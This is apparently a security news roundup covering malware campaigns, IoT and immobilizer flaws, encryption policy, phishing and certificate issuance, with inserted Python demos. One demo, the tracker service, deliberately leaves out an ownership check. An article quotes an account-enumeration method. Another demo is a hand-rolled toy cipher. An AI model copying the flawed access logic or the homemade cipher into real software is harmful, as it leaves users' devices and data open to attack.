The attacks rely on the Bifrose code to develop their backdoor, a malware that has been around since 2008. In 2014 it was reported that a new version of Bifrose appeared in the wild. Among the improvements observed in the new variant of Bifrose, the use of the Tor network to hide the C&C infrastructure.

“BIFROSE is mostly known for its keylogging routines, but it is capable of stealing far more information than just keystrokes,” states Trend Micro.

The Bifrose source code is known to have been sold in the past for around $10,000. The experts believe that the cyber criminal group behind the recent attacks against Asian entities has been active since 2010 and that it bought the Bifrose source code. The group has extensive human and financial resources and a wide variety of hacking tools in its arsenal.

“Our research indicates that the group has sufficient financial resources to purchase the source code of a widely available malware tool, and the human resources to design improved versions of its own backdoors based on this,” said Razor Huang, Trend Micro threat analyst.

The cyber criminal group most probably bought the Bifrose source code and extended its capabilities with new features:

“improving its functions, the group then designed a new installation flow, developed a new builder to create unique loader-backdoor pairs, and made more simple and concise backdoor capabilities, resulting in a new backdoor—KIVARS. This could mean that the operation is either backed financially by its sponsors or the group has the funds and resources to improve on an existing backdoor,” continues Trend Micro.

It is important to note that the KIVARS backdoor can also target 64-bit systems. Trend Micro explains that KIVARS is most probably linked to Bifrose because “some KIVARS backdoors’ PDB (program database) paths betray the code name of KIVARS to be “BR” + “{year}”. We think that BR most likely stands for Bifrose RAT.”
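As an added example (not Trend Micro's tooling and not derived from real KIVARS samples), the Python below pulls CodeView RSDS debug records out of a PE file's raw bytes and checks whether the PDB path carries a "BR" + year code name of the kind the researchers describe. Walking the file for the RSDS signature rather than the debug directory also catches records left in packed or truncated samples. The binary fragment, its GUID and the PDB path in `build_sample` are constructed for the demo; on a real sample you would pass the file's bytes to `extract_pdb_paths`.

```python
import re
import struct
import uuid

# CodeView RSDS record: "RSDS" | 16-byte GUID | 4-byte age | NUL-terminated PDB path.
RSDS_RE = re.compile(
    rb"RSDS(?P<guid>.{16})(?P<age>.{4})(?P<path>[^\x00]{1,260})\x00", re.DOTALL
)
# Code-name pattern described by Trend Micro: "BR" followed by a year.
CODENAME_RE = re.compile(r"\bBR(20\d{2})\b")


def extract_pdb_paths(data: bytes) -> list:
    """Return every RSDS record found in data as {guid, age, path}."""
    records = []
    for m in RSDS_RE.finditer(data):
        records.append({
            "guid": str(uuid.UUID(bytes_le=m.group("guid"))),
            "age": struct.unpack("<I", m.group("age"))[0],
            "path": m.group("path").decode("latin-1"),
        })
    return records


def codename_from_path(path: str):
    """Return the BR{year} token embedded in a PDB path, or None if absent."""
    m = CODENAME_RE.search(path)
    return m.group(0) if m else None


def build_sample(path: str, age: int = 1) -> bytes:
    """Constructed stand-in for a PE file containing one RSDS record.
    The GUID and the path are hypothetical values for the demonstration."""
    guid = uuid.UUID("12345678-1234-5678-1234-567812345678")
    return (b"\x00" * 64 + b"RSDS" + guid.bytes_le + struct.pack("<I", age)
            + path.encode("ascii") + b"\x00" + b"\x00" * 32)


if __name__ == "__main__":
    blob = build_sample("D:\\src\\BR2013\\Release\\loader.pdb", age=3)
    for rec in extract_pdb_paths(blob):
        print(rec["guid"], rec["age"], rec["path"], codename_from_path(rec["path"]))
```

The GUID and age together identify the exact PDB the linker produced, so two samples sharing them were built from the same compilation; the path is the softer, human-chosen signal that attribution work like Trend Micro's leans on.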

Another malware based on Bifrose developed by the same hacking group back in 2010 is XBOW. XBOW shows the “Recent,” “Desktop,” and “Program” folder paths, which are also present in the BIFROSE and KIVARS phone home messages.


Trend Micro monitored of a recent operation conducted by the cyber criminal group, dubbed Operation Shrouded Crossbow, that focused on the Asian market and in areas such as government contractors, privatized government agencies, and companies in the financial, healthcare, computer and consumer electronics sectors

The experts believe the cyber criminal group has separate teams for each activity: one for development, another for infiltration and targeting, and another to maintain its C&C infrastructure.

In my opinion, this shows the trend of the last 3 / 4 years, where more and more groups are becoming organized like a legitimate company, able to generate enough funds to keep going and to improve their methods.

Government Could Hack Children's Toys to Spy on You
Smartphones, Smart TVs, Smart Watches, Cell Phone Towers, Messaging services… but now, What's Next?
Smart Toys? Yes, probably.
A technology expert is warning that 'Smart Toys' could now be used by government intelligence agencies to spy on suspects.
As part of the Investigatory Powers Bill, children's connected toys could be the next item to be used by the government in an effort to spy on people, claims Antony Walker, deputy CEO of technology trade association techUK.
The Snooper's Charter – Government's Spy Eyes
While speaking to the UK parliament's Commons Science and Technology Committee, Walker warned MPs of how the Draft Investigatory Powers Bill could be abused to turn any Internet-connected device into a snooping tool.
The draft Investigatory Powers Bill (or the Snooper's Charter) would make it the legal duty of Internet service providers (ISPs) to help and assist the British intelligence agencies in hacking into various connected devices if requested to do so.
Walker explained that anything connected to the Internet could theoretically be hacked into remotely and used by the authorities to snoop on criminals and suspects.
Smart Toys to Spy on People
"A range of devices that have been in the news recently, in relation to a hack, are children’s toys that children can interact with," Walker told the committee. "These are devices that may sit in a child’s bedroom but are accessible."
The innocent looking smart devices, including Smart Toys, such as Hello Barbie and My Friend Cayla – that come Wi-Fi enabled and have microphones and cameras built-in – could become spying tools for intelligence agencies to gain information such as:
What you just said.
What you watch in your home and what you don't.
The actual location of your washing machine, laundry baskets and dishwasher tables.
Where you put your keys, credit card, passport, and wallet.
"In theory, the manufacturer of those products could be the subject of a warrant to enable equipment interference with those devices," Walker said. "So the potential extent, I think, is something that needs to be carefully considered."
Walker also emphasised that the government should carefully consider how the "equipment interference" warrants should be used for electronic gadgets and make sure they're "only used when necessary and proportionate for a legitimate purpose."
Securing Smart Toys
Moreover, the security on connected devices should be tighter because it is not just government, but also criminals that can hack into these devices.
After concerns were raised early December by Bluebox Labs, Barbie's manufacturer Mattel reportedly tightened the security on Hello Barbie that allows kids to talk to dolls over a cloud server connection.
It's thought that other smart toy manufacturers will shortly follow suit, especially after the news that Hong Kong toymaker VTech's systems were hacked, compromising 4.8 million records.

Hundreds of thousands of engine immobilizers remotely hackable

A New Zealand expert has found that hundreds of thousands of engine immobilizers are remotely hackable due to a flaw.
The New Zealander Lachlan Temple (@skooooch) has discovered that hundreds of thousands of engine immobilizers are remotely hackable. The expert found a flaw in a popular cheap car tracking and immobilizer gadget that could allow remote attackers to locate and eavesdrop on hundreds of thousands of vehicles and, in some cases, to interrupt the fuel supply to the engine, more alarmingly even while the vehicles are in motion.

Once users have installed the engine immobilizer in their car, they can remotely track the vehicle, block the engine, enable microphone recording, set up geo-fencing, and follow the car's movements.

The gadgets are rebranded by various vendors, including the Chinese ThinkRace; in Australia the engine immobilizers are branded as “Response” and sold at the electronics chain JayCar for about A$150.


One of the models available on the market is able to control the car's fuel pump, a feature implemented to remotely immobilize a stolen vehicle, but Temple discovered that an attacker could exploit a flaw in the management of session cookies to trigger this function.

This means that while you are driving, someone, anywhere, is able to stop your engine!

Temple presented his findings at the Kiwicon security conference in Wellington, where he added that the flaws currently allow anyone who logs into any account, including a demo account, to access any of the 360,000 ThinkRace units sold, without needing a password.

[Photo: Lachlan Temple. Photo by Darren Pauli / The Register]

“You just brute force every account, you can increment each one,” Temple told Vulture South. “You could disable someone’s car if they have wired the relay, so if that happened on a freeway that is pretty dangerous.” “Most people would wire it this way, that’s the main point of it and the reason why mechanics sell it.”

Temple suggests that users wire the relay to the starter motor; this way a remote attacker cannot stop the engine while the car is in motion and could only prevent it from starting once it has been turned off.
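The flaw Temple describes, a session that is not checked against the unit it is asked to control, is an authorization failure rather than a cryptographic one, and the fix belongs on the vendor's back end. The following Python model is an added example and not ThinkRace's code: it contrasts a service that lets any logged-in session (including a demo account) immobilize any unit with one that checks unit ownership and records denied attempts, so that a session probing many units it does not own stands out in the audit trail. Account names, passwords and unit numbers are constructed.

```python
import secrets
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed data: two owners, one tracker unit each, plus a demo account
# that owns nothing. Not real ThinkRace accounts or unit identifiers.
UNIT_OWNER: Dict[int, str] = {1001: "alice", 1002: "bob"}
PASSWORDS: Dict[str, str] = {"alice": "correct horse", "bob": "battery staple", "demo": "demo"}


@dataclass
class Session:
    user: str
    token: str


class TrackerService:
    """Back end for the tracker/immobilizer portal. enforce_ownership=False
    reproduces the weakness described in the article; True is the hardened form."""

    def __init__(self, enforce_ownership: bool) -> None:
        self.enforce_ownership = enforce_ownership
        self.sessions: Dict[str, Session] = {}
        self.immobilized: Set[int] = set()
        self.audit: List[tuple] = []

    def login(self, user: str, password: str) -> Optional[str]:
        """Return an unguessable session token, or None on bad credentials."""
        expected = PASSWORDS.get(user)
        if expected is None or not secrets.compare_digest(expected.encode(), password.encode()):
            return None
        token = secrets.token_urlsafe(16)
        self.sessions[token] = Session(user, token)
        return token

    def immobilize(self, token: str, unit_id: int) -> bool:
        """Cut the fuel-pump relay of unit_id on behalf of the session holder."""
        session = self.sessions.get(token)
        if session is None or unit_id not in UNIT_OWNER:
            return False
        # The hardened service ties every action to the unit's owner; the weak
        # one accepts any valid session for any unit (the flaw in the article).
        if self.enforce_ownership and UNIT_OWNER[unit_id] != session.user:
            self.audit.append(("denied", session.user, unit_id))
            return False
        self.immobilized.add(unit_id)
        self.audit.append(("immobilized", session.user, unit_id))
        return True

    def suspicious_sessions(self, threshold: int) -> List[str]:
        """Users denied on at least `threshold` distinct units: an enumeration signal."""
        denied: Dict[str, Set[int]] = {}
        for event, user, unit_id in self.audit:
            if event == "denied":
                denied.setdefault(user, set()).add(unit_id)
        return sorted(u for u, units in denied.items() if len(units) >= threshold)


if __name__ == "__main__":
    weak, hard = TrackerService(False), TrackerService(True)
    for svc in (weak, hard):
        demo = svc.login("demo", "demo")
        print("demo can immobilize unit 1001:", svc.immobilize(demo, 1001))
```

The ownership check is the essential part; the audit-based enumeration signal is cheap to add once that check exists, because every denied call is now a recorded event rather than a successful command.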

The flaws could also be exploited by attackers to access users' personal details, including phone numbers, or to eavesdrop on cars through the microphone included in the engine immobilizer kit.

Temple discovered that the same tracker is used by ThinkRace in watches sold to track children; in that case, an attacker could eavesdrop on kids and track them.

Temple announced that his next tests will focus on more expensive tracking solutions available on the market, including engine immobilizers used by commercial vehicle fleets.

Stay Tuned …

France will not Ban Public Wi-Fi Or Tor Network, Prime Minister Valls Confirms
Despite the French Ministry of Interior's demands, France will not ban the TOR anonymity network or free public Wi-Fi as a way to help law enforcement fight terrorism.
French Prime Minister Manuel Valls has gone on record saying that a ban on free public Wi-Fi is "not a course of action envisaged," and he is not in favor of banning the TOR anonymity network, either.
Following the deadly terror attacks on Paris last month, an internal document obtained by Le Monde indicated that the French government wanted to block TOR communications as well as ban the use of free public Wi-Fi during states of emergency, in an effort to fight terrorism more efficiently.
However, according to France PM, banning Encrypted Communications could affect the country's economy and security.
TOR and Free Wi-Fi Safe in France, PM Says
"A ban of [free public] Wi-Fi is not a course of action envisaged [and never has been]," Valls said (translated) on Wednesday.
Nor is he in favor of banning the TOR network, which encrypts and re-routes user traffic through a network of volunteer-operated servers, masking the real identities of users.
"Internet is a Freedom, is an extraordinary means of communication between people, it is a benefit to the economy," Valls added. "It's also a means for terrorists to communicate and spread their totalitarian ideology."
Therefore, he said the police must take some measures to improve their fight against terrorism in light of recent Paris attacks, but whatever measures they take to combat terrorism "must be effective."
The worldwide response to the recent Paris attacks has involved lawmakers in the United States and Europe calling for new laws on technology, forcing tech companies to put "backdoors" in their products and hand over encryption keys to the government on court orders.

New Spy Banker Trojan Telax exploits Google Cloud Servers

Security firm Zscaler discovered a malicious campaign based on a new strain of the Spy Banker banking malware.
Security experts at Zscaler discovered a malware-based campaign relying on a new strain of Spy Banker banking malware.

Spy Banker is an old threat, first detected in 2009. The new variant spreads over social media, primarily through Facebook, and relies on social engineering to trick users into clicking shortened URLs with the promise of coupons, vouchers or premium software downloads.

Zscaler experts also observed that a number of victims were compromised by drive-by downloads.

According to the researchers, the Spy Banker banking malware has been targeting Portuguese-speaking victims in Brazil.

“Zscaler ThreatLabZ has been closely monitoring a new Spy Banker Trojan campaign that has been targeting Portuguese-speaking users in Brazil. The malware authors are leveraging Google Cloud Servers to host the initial Spy Banker Downloader Trojan, which is responsible for downloading and installing Spy Banker Trojan Telax,” states the post published by Zscaler.

The campaign, spotted by researchers at Zscaler, spreads primarily over social media—Facebook for the most part—and uses convincing social engineering to trick users into clicking shortened URLs over the promise of coupons, vouchers or premium software downloads. A number of victims were also compromised by drive-by downloads.

The use of social media platforms to spread the malware is very effective, as it exploits users' trust in messages coming from their own network of contacts.

The malicious URLs point to a server hosted on Google Cloud Servers that hosts the Spy Banker downloader, which is dropped on the victim's machine. The downloader then retrieves the Spy Banker Trojan Telax, whose aim is to steal online banking credentials.


In the sample analyzed by Zscaler, the short URL points to a PHP file hosted on a Google Cloud server. The PHP file then performs a 302 redirect to download the initial Spy Banker Downloader Trojan payload.

In the attack illustrated by the experts, the executable file poses as Brazil's federal revenue online tax return service. In other cases observed by the researchers, the crooks used different themes, offering discount vouchers and fake premium software applications.

The researchers revealed that this specific short URL had been clicked more than 103,000 times, 102,000 of which came from Facebook.


Google has already cleaned up the cloud servers involved in the malicious campaign.

“It is important to note that Google has already cleaned up the cloud servers being currently redirected by these two active sites and hence the infection cycle will fail with a 404 Not Found message,” Zscaler said.

Zscaler published a detailed analysis of the new variant of the Spy Banker Trojan Telax … enjoy it!

ZeroDB, the end-to-end encrypted database, goes open source

The End-to-end encrypted database ZeroDB becomes open source and its code is available on GitHub, try it and contribute to the community with your experience.
While politicians and experts are debating around encryption, the End-to-end encrypted database ZeroDB becomes open source and its code is available on GitHub.

ZeroDB is an end-to-end encrypted database in which the storage server knows nothing about the data it is storing. As reported on the official website, query logic is performed client-side against encrypted data on a remote server, so even if the storage server is hacked, an attacker will not be able to view the unencrypted data.

ZeroDB allows users to develop applications with strong security with specific care to the end-user privacy. ZeroDB is particularly suitable for applications that need to store encrypted information on untrusted servers such as a public cloud storage.


The database is based on the Zope Object Database (ZODB), an object-oriented database for transparently and persistently storing Python objects, and is written in Python.

“In ZeroDB, the client is responsible for the database logic. Data encryption, decryption and compression also happen client side. Therefore, the server never has any knowledge about the data, its structure or order,” it is explained in the documentation. “Since the server has no insight into the nature of the data, the risk of a server-side data breach is eliminated. Even if attackers successfully infiltrate the server, they won’t have access to the cleartext data,” the developers pointed out.

The user data on the server is always encrypted, at rest, in transit, and even when used. The developers behind the ZeroDB project, MacLane Wilkison and Michael Egorov, changed the license from proprietary to AGPLv3 early this week.
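To make the “server knows nothing” property concrete, here is an added Python example; it is not ZeroDB's code and uses a deliberately simpler construction than ZeroDB does (HMAC-SHA256 as a keystream generator plus an HMAC authentication tag, standard library only, so it runs offline). The client derives independent subkeys from a master key, stores records under blinded labels, and the server holds only opaque bytes; a tampered blob or the wrong key yields nothing. The record contents and key material are constructed.

```python
import hashlib
import hmac
import json
import os
from typing import Dict, Optional


class UntrustedServer:
    """Stores opaque blobs under opaque labels; it never sees names or plaintext."""

    def __init__(self) -> None:
        self.blobs: Dict[bytes, bytes] = {}

    def put(self, label: bytes, blob: bytes) -> None:
        self.blobs[label] = blob

    def get(self, label: bytes) -> Optional[bytes]:
        return self.blobs.get(label)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 used as a PRF in counter mode; 32 keystream bytes per counter value."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


class Client:
    """All encryption, authentication and label blinding happens here, client side."""

    NONCE_LEN, TAG_LEN = 16, 32

    def __init__(self, master_key: bytes) -> None:
        # Derive separate subkeys so label, encryption and MAC keys are independent.
        self.label_key = hmac.new(master_key, b"label", hashlib.sha256).digest()
        self.enc_key = hmac.new(master_key, b"enc", hashlib.sha256).digest()
        self.mac_key = hmac.new(master_key, b"mac", hashlib.sha256).digest()

    def _label(self, name: str) -> bytes:
        # Blinded label: the server can match equal names but cannot read them.
        return hmac.new(self.label_key, name.encode(), hashlib.sha256).digest()

    def seal(self, plaintext: bytes) -> bytes:
        """Encrypt-then-MAC: nonce || ciphertext || tag."""
        nonce = os.urandom(self.NONCE_LEN)
        stream = _keystream(self.enc_key, nonce, len(plaintext))
        ct = bytes(a ^ b for a, b in zip(plaintext, stream))
        tag = hmac.new(self.mac_key, nonce + ct, hashlib.sha256).digest()
        return nonce + ct + tag

    def unseal(self, blob: bytes) -> Optional[bytes]:
        """Verify the tag before decrypting; any tampering or wrong key gives None."""
        if len(blob) < self.NONCE_LEN + self.TAG_LEN:
            return None
        nonce, ct, tag = blob[: self.NONCE_LEN], blob[self.NONCE_LEN : -self.TAG_LEN], blob[-self.TAG_LEN :]
        expected = hmac.new(self.mac_key, nonce + ct, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return None
        return bytes(a ^ b for a, b in zip(ct, _keystream(self.enc_key, nonce, len(ct))))

    def store(self, server: UntrustedServer, name: str, record: dict) -> None:
        server.put(self._label(name), self.seal(json.dumps(record).encode()))

    def load(self, server: UntrustedServer, name: str) -> Optional[dict]:
        blob = server.get(self._label(name))
        if blob is None:
            return None
        plaintext = self.unseal(blob)
        return None if plaintext is None else json.loads(plaintext)


def server_can_read(server: UntrustedServer, needle: bytes) -> bool:
    """True if the given plaintext bytes appear anywhere the server can see."""
    return any(needle in label or needle in blob for label, blob in server.blobs.items())


if __name__ == "__main__":
    srv, client = UntrustedServer(), Client(b"constructed-master-key")
    client.store(srv, "patient/42", {"name": "alice", "dx": "flu"})
    print("client reads:", client.load(srv, "patient/42"))
    print("server sees 'alice':", server_can_read(srv, b"alice"))
```

The point to take from it is the trust boundary, not the cipher: because the only thing crossing to the server is the output of keyed functions, a breach of the server yields labels and ciphertext that are useless without the client's key, which is what the ZeroDB developers mean by eliminating the risk of a server-side data breach.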

“Now that it’s open source, we want your help to make it better. Try it, build awesome things with it, break it. Then tell us about it,” states the post that officially announces ZeroDB going open source. “Today, we’re releasing a Python implementation. A JavaScript client will be following soon.”

ZeroDB is recommended for companies in the financial services industry, the healthcare industry, government agencies, media companies and telecoms.

The ZeroDB announcement comes a few days after that of Hashcat, the popular password recovery tool that has been released as open source under the MIT license.

Czech Republic faces attacks on Facebook account passwords

10.12.2015 Social networks
Attacks that try, in a sophisticated way, to trick the administrators of company Facebook pages into handing over their passwords are being carried out from, among other places, various fake profiles. Eset analysts are warning about the attacks. According to them, owners of company accounts on the social network Facebook are at risk; the attack vector is social engineering, in which the attacker tries to extract the victim's password for the social network. The attacker sends a message to the company's Facebook page claiming that the company has used on its “wall” a photograph that infringes his copyright. The message also contains a URL that is supposed to lead to the photograph in question.

In reality, however, the administrator of the company's Facebook account is redirected to a fake page that looks like Facebook. If the victim does not notice and enters his login name and password on that page, the attacker obtains them immediately and nothing stops him from taking full control of your company's Facebook account.

These practices were brought to the experts' attention by the Facebook community Nebezpečné, which deals with fraudulent pages. In some cases the sites imitating Facebook's login page were registered directly in the Czech Republic.

“After obtaining the password, the attacker can use your Facebook account to promote his own products or websites carrying advertising that he earns money from. Alternatively, he can use it to spread malicious code across the social network,” says Martin Skýpala, product specialist at Eset. “His goal is financial gain, but your loss will be damage to the company's good name.”

In the cases recorded by the analysts, the phishing messages were always written in Czech. The attacker sends them either directly from his own Facebook account (which may be registered under a false name) or via accounts he has already gained access to, without their owners having any idea.

In the most recent case the attacker even posed as an employee of the media house Mafra. In another, the fake sender signed as an employee of the New York marketing agency Blue Fountain Media, which does not even have a branch in the Czech Republic.

As a preventive measure, companies are advised to raise security awareness among their employees. Employees should not blindly click on any link that reaches them, whether via a Facebook message or by e-mail.

Since these are phishing pages, they can also be caught by security software with a good anti-phishing module. Some media outlets in Slovakia learned what the consequences of such an attack can be in the spring of this year, when they lost control of their Facebook accounts. After taking over their profiles, the attackers removed the other administrators and published posts that the editorial teams had no way of influencing.

FBI Director Asks Tech Companies to At least Don't Offer End-to-End Encryption
FBI declared War against Encryption.
Encryption is hampering government intelligence agencies' ability to detect terrorist activities, and after the recent ISIS-linked terror attacks in Paris and California, the issue has once again become a political target in Washington.
...and meanwhile, Kazakhstan plans to make it Mandatory for its Citizens to Install Internet Backdoor, allowing the government to intercept users' traffic to any secure website and access everything from web browsing history to usernames and passwords.
FBI: For God's Sake, Don't Use End-to-End Encryption
At a Senate hearing on Wednesday, FBI's Director James Comey called for tech companies currently providing users with end-to-end encryption to reconsider "their business model" and simply stop doing that, reported The Intercept.
Yes, instead of asking companies for a "backdoor" this time, Comey suggested that they adopt encryption techniques that help federal agencies intercept and obtain end-to-end encrypted communications when necessary.
"The government doesn't want a backdoor, but [it] hopes to get to a place where if a judge issues an order, the company figures out how to supply that information to the judge and figures out on its own the best way to do that," said Comey.
Comey: Keep Readable Version of Customers' Messages
End-to-end Encryption is a secure communication that encrypts the data on the sender's system before passing it to a company server. The company then passes the encrypted data to the intended recipient, who is the only person who can decrypt it.
Nobody in between, be it an application service provider, an Internet service provider (ISP), a hacker, or even law enforcement officials, can read the data or tamper with it.
However, Comey is asking for the technology companies to retain a readable version of that initial data, just in case the authorities need it.
"There are plenty of companies today that provide secure services to their customers and still comply with court orders," he said. "There are plenty of folks who make good phones [and] are able to unlock them in response to a court order."
Terrorists and Encryption
Moreover, Comey also gave an example of a situation in which law enforcement officials faced an obstacle because of encryption.
Here's the example Comey provided:
"In May, when two terrorists attempted to kill a whole lot of people in Garland, Texas, and were stopped by the action of great local law enforcement. That morning, before one of those terrorists, left to try to commit mass murder, he exchanged 109 messages with an overseas terrorist. We have no idea what he said because those messages were encrypted. That is a big problem."

So in the end, the FBI director did not make crystal clear exactly what measures he wants tech companies to adopt, or whether he would favor laws to force the companies to do it. But he made it fairly clear that he is not at all satisfied with the current drive to encrypt devices.

AVG, McAfee, and Kaspersky antivirus were vulnerable to critical flaw

Experts at enSilo have found a critical security vulnerability in various antivirus (AV) software that could be exploited by attackers to turn the AntiVirus to an attack-enabler tool.
Some of the most important security firms have had an ugly surprise: the security software they offer to their clients has been affected by a serious vulnerability that could be exploited to hack computers.

In March, security researchers at enSilo discovered a serious vulnerability in the popular free antivirus engine AVG Internet Security 2015. The researchers found that the software was allocating memory with read, write, and execute (RWX) permissions at a predictable address. Knowledge of that memory address could be exploited by an attacker to inject malicious code into the target system and execute it.
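enSilo's finding hinges on two properties: a mapping that is readable, writable and executable at once, and an address that is the same from one run to the next. As an added example (not enSilo's AVulnerabilityChecker, which targets Windows), the Python below applies the same two checks to Linux /proc/<pid>/maps output: it lists RWX mappings and reports those that appear at an identical address range in two independent snapshots of the same program. The two snapshots are constructed, as are the file names in them.

```python
import re
from typing import List, NamedTuple


class Region(NamedTuple):
    start: int
    end: int
    perms: str
    path: str


# One /proc/<pid>/maps line: "start-end perms offset dev inode [path]".
MAPS_LINE_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\S+\s*(.*)$")

# Constructed snapshots of two separate runs of the same (fictional) scanner.
# Both contain an anonymous RWX mapping at a fixed address and another RWX
# mapping whose address differs between runs (the randomized heap/mmap area).
RUN_A = """\
00400000-00452000 r-xp 00000000 08:01 1234 /usr/bin/scanner
00651000-00652000 rw-p 00051000 08:01 1234 /usr/bin/scanner
10000000-10010000 rwxp 00000000 00:00 0
7f3a1c000000-7f3a1c021000 rwxp 00000000 00:00 0
7f3a1e5d0000-7f3a1e791000 r-xp 00000000 08:01 5678 /lib/x86_64-linux-gnu/libc-2.23.so
"""
RUN_B = """\
00400000-00452000 r-xp 00000000 08:01 1234 /usr/bin/scanner
00651000-00652000 rw-p 00051000 08:01 1234 /usr/bin/scanner
10000000-10010000 rwxp 00000000 00:00 0
7f81a9000000-7f81a9021000 rwxp 00000000 00:00 0
7f81ab5d0000-7f81ab791000 r-xp 00000000 08:01 5678 /lib/x86_64-linux-gnu/libc-2.23.so
"""


def parse_maps(text: str) -> List[Region]:
    """Parse maps-format text into Region tuples; unparseable lines are skipped."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE_RE.match(line.strip())
        if m:
            regions.append(Region(int(m.group(1), 16), int(m.group(2), 16), m.group(3), m.group(4)))
    return regions


def rwx_regions(regions: List[Region]) -> List[Region]:
    """Mappings that are readable, writable and executable at the same time."""
    return [r for r in regions if r.perms.startswith("rwx")]


def predictable_rwx(snapshot_a: str, snapshot_b: str) -> List[Region]:
    """RWX regions found at the same address range in two independent runs:
    the combination enSilo describes, since a fixed address defeats ASLR."""
    a = {(r.start, r.end): r for r in rwx_regions(parse_maps(snapshot_a))}
    b = {(r.start, r.end) for r in rwx_regions(parse_maps(snapshot_b))}
    return [r for key, r in a.items() if key in b]


if __name__ == "__main__":
    for r in predictable_rwx(RUN_A, RUN_B):
        print(f"predictable RWX mapping {r.start:#x}-{r.end:#x} {r.path or '[anon]'}")
```

On a live system the two snapshots would come from two fresh launches of the product under test; an RWX mapping that moves between runs is a code-quality smell, while one that does not move is the condition the researchers reported.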

enSilo reported the vulnerability to AVG, which promptly fixed it within a couple of days. The experts at enSilo then decided to analyze other software sold by the main security firms, including McAfee and Kaspersky.

They discovered that VirusScan Enterprise version 8.8 and Kaspersky Total Security 2015 were also affected by the vulnerability. Below is the list of vulnerable products discovered by the experts:

For now we have found this vulnerability in the following Anti-Virus products. We’ll continue updating this list as we receive more information.

McAfee Virus scan Enterprise version 8.8. This vulnerability appears in their Anti Malware + Add-on Modules, scan engine version (32 bit) 5700.7163, DAT version 7827.0000, Buffer Overflow and Access Protection DAT version 659, Installed patches: 4. We have notified McAfee and they have silently fixed it in their patch dated Aug. 20, 2015.
Kaspersky Total Security 2015 – kts15.0.2.361en_7342. We have notified Kaspersky and they have silently fixed it in their patch dated Sept. 24, 2015.
AVG Internet Security 2015 build 5736 + Virus database 8919. As mentioned above, AVG has released their patch on March 12th.
The researchers plan to analyze other solutions and update the readers about the status of their security software.

“We’ll continue updating this list as we receive more information,” said Tomer Bitton, VP of research at enSilo, in a blog post.

“Given that this is a repetitive coding issue amongst Anti-Virus – an intrusive product, we believe that this vulnerability is also likely to appear in other intrusive products, non-security related, such as application-performing products.”

Other experts have written about the security issue; Tavis Ormandy, security expert at Google, has written about a similar issue with Kaspersky software. In his blog post the researcher detailed how the security issue could be exploited.


Considering the gravity of the problem and its widespread nature, enSilo has created a free checking tool called AVulnerabilityChecker to allow users to check whether their machine is vulnerable.

“Considering the gravity of this issue, we created a tool – AVulnerabilityChecker – that checks whether an application running on your machine is vulnerable to this flaw. If vulnerable, AVulnerabilityChecker will not be able to tell you which application contains the flaw, but it will point out where to start the analysis.” states enSilo.

McAfee and Kaspersky have already fixed the security issue.

Will all phishing sites have a valid certificate?

10.12.2015 Threats

With the arrival of the Let's Encrypt project, voices have started asking whether “a free certificate for everyone” also means one for every phishing and malware site. Does it mean that a certificate is no longer a guarantee of quality and that the authority will issue one to anyone who asks, regardless of their intentions and the content of their website?

To begin with, it is worth recalling that Let's Encrypt is an initiative of the Internet Security Research Group (ISRG), supported among others by Mozilla, Cisco, Facebook, the EFF and Akamai. The goal is to remove all obstacles to convenient encryption on the web and to give users automated tools for obtaining and deploying HTTPS with a trusted certificate. Not only according to Let's Encrypt, HTTPS should be everywhere wherever possible.

The authority has passed beta testing and a few days ago started issuing certificates without the need for an invitation. Although the whole project is still labelled beta, it issues trusted certificates and you can have them on your website.

Encrypted and “secure” attacks

Criticism of the authority appeared very quickly, specifically of issuing certificates “to everyone”. The authority does not examine the content of the website in any way, so in theory it will issue a certificate even to a phishing site, which only needs to be able to serve files at the right path on the server. That is of course not technically difficult to arrange, and it then does not matter at all which (sub)domain such a site runs on. It obtains a certificate with which it can then present itself to users.

You can recognize a fake Facebook by the missing padlock… or can you?
Users' most common fear is that a site marked with a green padlock will look more trustworthy and they will enter personal data without worrying about their security. After all, it said it was secure! These worries are certainly justified; users tend to trust a site that says it is secure. If that is further reinforced by a big picture of a padlock, then it must be fine. Today we teach them not to look at pictures on the page but at the padlock icon next to the address. But that is not actually a correct indicator either, because it says nothing about the content of the site.

Especially with Domain Validated (DV) certificates, the website is not actually tied to the validation in any way. It is enough for the authority that the applicant can prove a link to the domain and/or the website on it, usually by publishing some unique piece of information. Yes, from a security point of view this is a poor approach, because the certification authority does not really perform any real certification. It only does a very cursory check and issues a statement about it. But Pandora's box was opened long ago and there is no way back from DV certificates. From the users' perspective, though, they are just as trustworthy (read: the padlock is just as green) as standard OV certificates.

Although such certificates existed long before Let's Encrypt and various authorities allowed automated communication with the applicant (and those few dollars are not a problem for an attacker either), it was only the new initiative that made the crowd raise an eyebrow and ask whether “for everyone” really also means operators of phishing sites. Presumably because Let's Encrypt is “too automated” and “too free”, so by its very principle it no longer poses any obstacles at all.

Let's Encrypt's representatives have commented on the whole problem at some length. The decision was very hard for us. On the one hand, we don't like these sites either, and our goal is to build a safer web. On the other hand, we are not sure that a certificate issuer (at least of Domain Validation certificates) is at the level where it should be policing phishing and malware sites. To the credit of the authority's operators, they did not give up on the problem with a mere statement that it is somebody else's problem (SEP).

Authorities are poor gatekeepers

At the technical level the situation is clear: DV certificates only prove that a specific public key belongs to a specific domain. The certificate does not state how trustworthy the domain (or even the content on it) is, how it handles information, or whether the site violates any other rules. It also lacks information about the real identity of the site's operator; that is not the job of a DV certificate either. Nevertheless, many people believe that the presence of a trusted certificate indicates at least some of these things.

Let's Encrypt explains, however, that a certification authority is not in a good position to enforce anti-phishing and anti-malware policies; it does not have good enough information about the site's content. It is much better to cooperate with large organizations that have a much better awareness of content, such as Microsoft and Google, says Josh Aas, executive director of ISRG. These companies deliberately crawl the web, collect data from it and, using large-scale machine learning (supervised by dozens of people), can detect dangerous websites. They then share the information through APIs, so it is possible to obtain the reputation of individual sites from them.

